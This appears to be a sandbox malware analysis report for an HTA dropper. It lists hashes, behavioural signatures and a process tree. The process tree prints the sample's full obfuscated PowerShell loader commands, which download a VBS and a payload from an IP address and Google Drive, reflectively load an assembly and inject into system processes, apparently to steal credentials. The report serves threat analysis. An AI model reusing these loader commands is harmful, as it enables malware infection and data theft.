Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
07/11/2024, 02:51
Static task
static1
Behavioral task
behavioral1
Sample
9ca5ac2764a3fdcfa154438072ee6439679dc6e920ecc4a753c34eab3b80deff.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
9ca5ac2764a3fdcfa154438072ee6439679dc6e920ecc4a753c34eab3b80deff.hta
Resource
win10v2004-20241007-en
General
-
Target
9ca5ac2764a3fdcfa154438072ee6439679dc6e920ecc4a753c34eab3b80deff.hta
-
Size
207KB
-
MD5
a834a210eda3bb2a9c5a69e046043cf5
-
SHA1
d3f7e634a214c3edda1a69b496cae5e8f4c58492
-
SHA256
9ca5ac2764a3fdcfa154438072ee6439679dc6e920ecc4a753c34eab3b80deff
-
SHA512
6019b4c7788df78c3ea2752fe9085e66b333e7f52a31ce9b4632e1d59b8ab3b44c9a96e6e585a33749840e4af422dcaf14ff0d53a4823d65e96ae70aeea98298
-
SSDEEP
96:43F97ZLDySraaVxDyIraaVn6cKt1zRoy3yyhDywMDyPDraaVSDyCQ:43F1ZLdr3Dpr3AcKvay3ySGsDr3wTQ
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0
https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0
Signatures
-
Blocklisted process makes network request 30 IoCs
flow pid Process 14 3048 POWErsHell.eXE 17 3132 powershell.exe 21 3132 powershell.exe 26 3132 powershell.exe 40 2364 mshta.exe 46 2364 mshta.exe 48 2364 mshta.exe 49 2364 mshta.exe 50 2364 mshta.exe 51 2364 mshta.exe 53 2364 mshta.exe 55 2364 mshta.exe 58 2364 mshta.exe 63 2364 mshta.exe 64 2364 mshta.exe 66 2364 mshta.exe 68 2364 mshta.exe 69 2364 mshta.exe 70 2364 mshta.exe 71 2364 mshta.exe 73 2364 mshta.exe 75 2364 mshta.exe 76 2364 mshta.exe 77 2364 mshta.exe 78 2364 mshta.exe 80 2364 mshta.exe 81 2364 mshta.exe 82 2364 mshta.exe 83 2364 mshta.exe 84 2364 mshta.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 4288 powershell.exe 3132 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 2292 powershell.exe 3048 POWErsHell.eXE -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 16 drive.google.com 17 drive.google.com -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 3132 set thread context of 2148 3132 powershell.exe 106 PID 2148 set thread context of 2364 2148 aspnet_compiler.exe 82 PID 2148 set thread context of 2356 2148 aspnet_compiler.exe 110 PID 2356 set thread context of 2364 2356 setupugc.exe 82 PID 2356 set thread context of 5088 2356 setupugc.exe 112 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setupugc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language POWErsHell.eXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe -
description ioc Process Key created \Registry\User\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 setupugc.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings POWErsHell.eXE -
Suspicious behavior: EnumeratesProcesses 26 IoCs
pid Process 3048 POWErsHell.eXE 3048 POWErsHell.eXE 2292 powershell.exe 2292 powershell.exe 4288 powershell.exe 4288 powershell.exe 3132 powershell.exe 3132 powershell.exe 3132 powershell.exe 3132 powershell.exe 2148 aspnet_compiler.exe 2148 aspnet_compiler.exe 2148 aspnet_compiler.exe 2148 aspnet_compiler.exe 2148 aspnet_compiler.exe 2148 aspnet_compiler.exe 2148 aspnet_compiler.exe 2148 aspnet_compiler.exe 2356 setupugc.exe 2356 setupugc.exe 2356 setupugc.exe 2356 setupugc.exe 2356 setupugc.exe 2356 setupugc.exe 2356 setupugc.exe 2356 setupugc.exe -
Suspicious behavior: MapViewOfSection 7 IoCs
pid Process 2148 aspnet_compiler.exe 2364 mshta.exe 2364 mshta.exe 2356 setupugc.exe 2356 setupugc.exe 2356 setupugc.exe 2356 setupugc.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3048 POWErsHell.eXE Token: SeDebugPrivilege 2292 powershell.exe Token: SeDebugPrivilege 4288 powershell.exe Token: SeDebugPrivilege 3132 powershell.exe -
Suspicious use of WriteProcessMemory 35 IoCs
description pid Process procid_target PID 2364 wrote to memory of 3048 2364 mshta.exe 85 PID 2364 wrote to memory of 3048 2364 mshta.exe 85 PID 2364 wrote to memory of 3048 2364 mshta.exe 85 PID 3048 wrote to memory of 2292 3048 POWErsHell.eXE 89 PID 3048 wrote to memory of 2292 3048 POWErsHell.eXE 89 PID 3048 wrote to memory of 2292 3048 POWErsHell.eXE 89 PID 3048 wrote to memory of 1040 3048 POWErsHell.eXE 92 PID 3048 wrote to memory of 1040 3048 POWErsHell.eXE 92 PID 3048 wrote to memory of 1040 3048 POWErsHell.eXE 92 PID 1040 wrote to memory of 1408 1040 csc.exe 93 PID 1040 wrote to memory of 1408 1040 csc.exe 93 PID 1040 wrote to memory of 1408 1040 csc.exe 93 PID 3048 wrote to memory of 3612 3048 POWErsHell.eXE 98 PID 3048 wrote to memory of 3612 3048 POWErsHell.eXE 98 PID 3048 wrote to memory of 3612 3048 POWErsHell.eXE 98 PID 3612 wrote to memory of 4288 3612 WScript.exe 99 PID 3612 wrote to memory of 4288 3612 WScript.exe 99 PID 3612 wrote to memory of 4288 3612 WScript.exe 99 PID 4288 wrote to memory of 3132 4288 powershell.exe 101 PID 4288 wrote to memory of 3132 4288 powershell.exe 101 PID 4288 wrote to memory of 3132 4288 powershell.exe 101 PID 3132 wrote to memory of 2192 3132 powershell.exe 105 PID 3132 wrote to memory of 2192 3132 powershell.exe 105 PID 3132 wrote to memory of 2192 3132 powershell.exe 105 PID 3132 wrote to memory of 2148 3132 powershell.exe 106 PID 3132 wrote to memory of 2148 3132 powershell.exe 106 PID 3132 wrote to memory of 2148 3132 powershell.exe 106 PID 3132 wrote to memory of 2148 3132 powershell.exe 106 PID 3132 wrote to memory of 2148 3132 powershell.exe 106 PID 3132 wrote to memory of 2148 3132 powershell.exe 106 PID 2364 wrote to memory of 2356 2364 mshta.exe 110 PID 2364 wrote to memory of 2356 2364 mshta.exe 110 PID 2364 wrote to memory of 2356 2364 mshta.exe 110 PID 2356 wrote to memory of 5088 2356 setupugc.exe 112 PID 2356 wrote to memory of 5088 2356 setupugc.exe 112
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\9ca5ac2764a3fdcfa154438072ee6439679dc6e920ecc4a753c34eab3b80deff.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Blocklisted process makes network request
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Windows\SysWOW64\WiNdowSpOWerShelL\v1.0\POWErsHell.eXE"C:\Windows\SYsTEM32\WiNdowSpOWerShelL\v1.0\POWErsHell.eXE" "pOWErsheLl.exE -EX BypaSS -NOp -w 1 -C DeVIcecRedentiaLDepLoYmENT.eXE ; IeX($(IEx('[syStEm.tEXt.ENcoDing]'+[ChaR]58+[char]58+'Utf8.getStRInG([SYStEm.CONVERT]'+[CHaR]0x3a+[cHaR]0x3A+'fROmbASe64stRinG('+[cHar]0x22+'JEE5QjJqICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9OLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRwY1VPTmRSLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdjWFpDLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRNVXVCLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNdGZMc256LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEliQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImRkUGJnTElwWEIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVTUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEthSXZOWFFvICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBOUIyajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNDYvMjE3L3NlZXRoZWJlc3R0aGluZ3N3aXRoZ29vZG5ld3NnaXZlbm1lZ3JlYXR3YXlzLnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0dGhpbmdzd2l0aGdvb2RuZXdzZ2l2ZW5tZWdyZWF0dy52YnMiLDAsMCk7U1RBcnQtU2xFZXAoMyk7c1RhUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3N3aXRoZ29vZG5ld3NnaXZlbm1lZ3JlYXR3LnZicyI='+[ChAr]34+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BypaSS -NOp -w 1 -C DeVIcecRedentiaLDepLoYmENT.eXE3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2292
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2y2etigm\2y2etigm.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1040 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA345.tmp" "c:\Users\Admin\AppData\Local\Temp\2y2etigm\CSC46AA2912C3EE4C348AE84B86A9AD7CE.TMP"4⤵
- System Location Discovery: System Language Discovery
PID:1408
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingswithgoodnewsgivenmegreatw.vbs"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3612 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzaG9NRVsyMV0rJFBzaG9NZVszNF0rJ3gnKSggKCc3eicrJ3hpbWFnZVVybCA9IEs5a2h0dHBzOi8vZHJpdicrJ2UuZ29vZ2xlLmNvbS91Yz9leHBvcnQnKyc9ZG93bmxvYWQmaWQ9MVV5SHF3cm5YQ2xLQkozajYzTGwxdDJTdFZnR3hiU3QwIEs5azs3eicrJ3h3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OZXQuJysnV2ViQ2xpZW50Ozd6eGknKydtYWdlQnl0JysnZXMgPSA3eicrJ3h3ZWJDbGllbnQuRG93bmxvYWREYXRhKDd6eGltYWdlVXJsKTs3enhpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg3enhpbWFnZUJ5dGVzKTs3enhzdGFydEZsYWcgPSBLOWs8PEJBU0U2NF9TVEFSVD4+SzlrOzd6eGUnKyduZEZsYWcgPSBLOWs8PEJBU0U2NF9FTkQ+Pks5azs3enhzdGFydEluZGV4ID0gN3p4aW1hZ2VUZXh0LkluZGV4T2YoN3p4c3RhcnRGbGFnKTsnKyc3enhlbmRJbmRleCA9IDd6eGltYWdlVGV4dC5JbmRleE9mKDd6JysneGVuZEZsYWcpOzd6eHN0YXJ0SW5kZXggLWcnKydlIDAgLWFuZCA3JysnenhlbmRJbicrJ2RleCAtZ3QgN3onKyd4c3RhcnRJbmQnKydleDs3enhzdGFydEluZGV4ICs9IDd6eHN0YXJ0RmxhZy5MZW5ndGg7N3p4YmFzZTYnKyc0TGVuZ3RoID0gN3p4ZW5kJysnSW5kZXggLSA3enhzdGFydEluZCcrJ2UnKyd4Ozd6eGJhc2U2NENvbW1hbmQnKycgPSA3enhpbWFnZVQnKydleHQuU3Vic3RyaW5nKDd6eHN0YXJ0SW5kZXgsJysnIDd6eGJhc2U2NExlbmd0aCk7N3p4YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoN3p4YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIGFDeCBGb3JFYWNoLU9iamVjdCB7IDd6eF8gfSknKydbLTEuLi0oN3p4YmFzZTY0Q29tbWFuZC5MZScrJ25ndGgpXTs3enhjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDd6JysneGJhc2U2NFJldmVyc2VkKTs3enhsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdCcrJ2lvbi5Bc3NlbWJseV06OicrJ0xvYWQoN3p4Y29tbWFuZEJ5dGVzKTs3enh2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKEs5a1ZBSUs5ayk7N3p4dmFpTWV0aG9kLkludm9rZSg3enhudWxsLCBAKEs5a3R4dC5SUklNTUEnKydDLzcxMi82NDEuMzkxLjMuMjkxLy86cCcrJ3R0aEs5aywgSzlrZGVzYXRpdmFkb0s5aywgSzlrZGVzYXRpdmFkJysnb0s5aywgSzlrZGVzYXRpdmFkb0s5aywgSzlrYXNwbmV0X2NvbXBpbGVySzlrLCBLOWtkZXNhdGl2YWRvSzlrLCAnKydLOWtkJysnZXNhdGl2YWRvSzlrLEs5a2Rlc2F0aXZhZG9LOWssSzknKydrZGVzYScrJ3RpdmFkb0s5ayxLOWtkZXNhdGl2YWQnKydvSzlrLEs5a2Rlc2F0aXZhZG9LOWssSzlrZGUnKydzYXRpdmFkb0s5ayxLOWsxSzlrLEs5a2Rlc2F0aXZhZG9LOWspKTsnKS5SRXBsYUNFKCdhQ3gnLFtTVFJJbmddW0NIQVJdMTI0KS5SRXBsYUNFKChbQ0hBUl03NStbQ0hBUl01NytbQ0hBUl0xMDcpLFtTVFJJbmddW0NIQVJdMzkpLlJFcGxhQ0UoJzd6eCcsJyQnKSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4288 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $pshoME[21]+$PshoMe[34]+'x')( ('7z'+'ximageUrl = K9khttps://driv'+'e.google.com/uc?export'+'=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0 K9k;7z'+'xwebClient = New-Object Sys'+'tem.Net.'+'WebClient;7zxi'+'mageByt'+'es = 7z'+'xwebClient.DownloadData(7zximageUrl);7zximageText = [System.Text.Encoding]::UTF8.GetString(7zximageBytes);7zxstartFlag = K9k<<BASE64_START>>K9k;7zxe'+'ndFlag = K9k<<BASE64_END>>K9k;7zxstartIndex = 7zximageText.IndexOf(7zxstartFlag);'+'7zxendIndex = 7zximageText.IndexOf(7z'+'xendFlag);7zxstartIndex -g'+'e 0 -and 7'+'zxendIn'+'dex -gt 7z'+'xstartInd'+'ex;7zxstartIndex += 7zxstartFlag.Length;7zxbase6'+'4Length = 7zxend'+'Index - 7zxstartInd'+'e'+'x;7zxbase64Command'+' = 7zximageT'+'ext.Substring(7zxstartIndex,'+' 7zxbase64Length);7zxbase64Reversed = -join (7zxbase64Command.ToCharArray() aCx ForEach-Object { 7zx_ })'+'[-1..-(7zxbase64Command.Le'+'ngth)];7zxcommandBytes = [System.Convert]::FromBase64String(7z'+'xbase64Reversed);7zxloadedAssembly = [System.Reflect'+'ion.Assembly]::'+'Load(7zxcommandBytes);7zxvaiMethod = [dnlib.IO.Home].GetMethod(K9kVAIK9k);7zxvaiMethod.Invoke(7zxnull, @(K9ktxt.RRIMMA'+'C/712/641.391.3.291//:p'+'tthK9k, K9kdesativadoK9k, K9kdesativad'+'oK9k, K9kdesativadoK9k, K9kaspnet_compilerK9k, K9kdesativadoK9k, '+'K9kd'+'esativadoK9k,K9kdesativadoK9k,K9'+'kdesa'+'tivadoK9k,K9kdesativad'+'oK9k,K9kdesativadoK9k,K9kde'+'sativadoK9k,K9k1K9k,K9kdesativadoK9k));').REplaCE('aCx',[STRIng][CHAR]124).REplaCE(([CHAR]75+[CHAR]57+[CHAR]107),[STRIng][CHAR]39).REplaCE('7zx','$') )"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3132 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"6⤵PID:2192
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2148
-
-
-
-
-
-
C:\Windows\SysWOW64\setupugc.exe"C:\Windows\SysWOW64\setupugc.exe"2⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2356 -
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"3⤵PID:5088
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD53d086a433708053f9bf9523e1d87a4e8
SHA1b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA2566f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
-
Filesize
12KB
MD5ba534ea8e88d9edf61d5f9589b68b0fd
SHA1af66d85643a625b374ba49b805542b376a222b3b
SHA25669e91058bbe1ebd3e09f364218b0f5553ba2e71536c98f143c2099d6af68fe1a
SHA512b9cf4524f4951b22b2205c412122361836c16dfb4e21608c6c5ef4cb65f42e3fb10ca59309d79cd33f06468ab5058bc237c270be7ebfe33a8d50d169905017ae
-
Filesize
18KB
MD56950ff7e0c0f0a53efc7363d656148fd
SHA157b72cbb802fb7c0b5433d40268e61adc789ab45
SHA25635a30883527aa900ec2c1cd8be9a041732a6ed86e27407b7b2b1f02d2c25799f
SHA5129c1c686f63ed5b797ea940a40cba122f71f97993b8ccff987ac76b278b1bfd459e69341671f3b57d18cb27d6c72f6364262bb2181428847694c8c042903b9949
-
Filesize
3KB
MD5045b3b2bbb01d0a614f6083796eef4e0
SHA11e8f54adcb89b76a87b6929a6c1e09ff76faa09e
SHA25670cf93a8016abe48ec7dbddb5a72af8d189d9180d030d928530b463241c078f2
SHA5128508b012729f92d341c94957d749099b0791528a2c6c826559599679c2cd3098ec9025ec38055a4d16450b291887ea76fd4b45b54f00b9af8b4ce148ef1469f1
-
Filesize
1KB
MD50247c31b512e1f7719732a60829cbee3
SHA116949587db9f0264be925943b7af3fc7f69a54e6
SHA256ca9ada3c73f47ab487de026bfd73c000a0e37482c032e018a43ae05627cea247
SHA512ec2cc350e90684c14b33e043a2035afc20ac476e91b67c2ff42258f699b23341365f01f5350c84674b0c53b77281d123714230ad259c0617044dce91f4960b24
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
138KB
MD56d668e698465e2b247c18af64cd92768
SHA19f0d8dc1bf9863ce10df0779404b46f11e05878e
SHA256ebe21b018238666a7386c805e391635b4a6a1397be0cebcc1cd1a0b4c2a9ac03
SHA51253d6e582ad8ab0a373183e4825a829ab9788dcd965b76912b2666a0ad6e17233f100a2c9916fc9bb36c6034a4b21588ac26793f87f7f66b2f5037652ea989d8e
-
Filesize
483B
MD50d07f4ab30ba01353f767eca7b280b1a
SHA1b5b6d65652a490f5eeeaf899884cec55cc09d455
SHA256f7082f6db40c262a4b1f34cbf2e9a8ed8a97090e49968d630cb087d1a62ef31e
SHA512001b1bd234cf1f9dacf6fa54fad0857277c4c349c2f615fb4f6d2c1dc064a249594aedb1c9587a7f1eba1de1a9aa825e5f415248ddc9379475723105524165a3
-
Filesize
369B
MD5faaa2420f277dcab393401fc70522d64
SHA1abbc1a2d17011b9b38cb3e75f2cb7f511b64e63b
SHA2560476b05c93092b0c9b0ef5392bf65359f54d26a035db5d3014ec9d58982e4153
SHA512ddb1aaee508aef029024cdf3e96dd0dd6b7f00a8e5207688a1af2cf43a110eb395e7e65f18ab6e0513b6a822e1342352631090abe7b367a55419a3b51d11ee30
-
Filesize
652B
MD5ec4a9b1e96e66cfb9fcf41180779f432
SHA165c8b96275a380f90e1369b06c70261126bdb0d5
SHA256b9b61800810c0619996f3549afc257c34b1af6ce46691a324bc4590223829d7a
SHA5120007fd7ab0ea98e2b00ede381b6697f743bca4b5e42b401cbb489e8bb5927f5899e854898a96a363782a6c98d347db1ed93340cdf65bef17053a5366cb7e7379